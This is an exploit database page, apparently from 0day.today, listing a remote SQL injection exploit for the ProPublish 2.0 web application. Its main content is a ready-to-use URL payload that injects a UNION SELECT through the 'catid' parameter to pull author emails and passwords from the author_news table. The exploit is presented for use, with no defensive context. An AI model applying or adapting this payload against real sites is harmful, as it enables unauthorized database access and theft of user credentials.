[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ProPublish 2.0 (catid) Remote SQL Injection Vulnerability

Author
FarhadKey
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-486
Category
web applications
Date add
02-06-2006
Platform
unsorted
=========================================================
ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
=========================================================



# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir

Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE



#  0day.today [2024-12-25]  #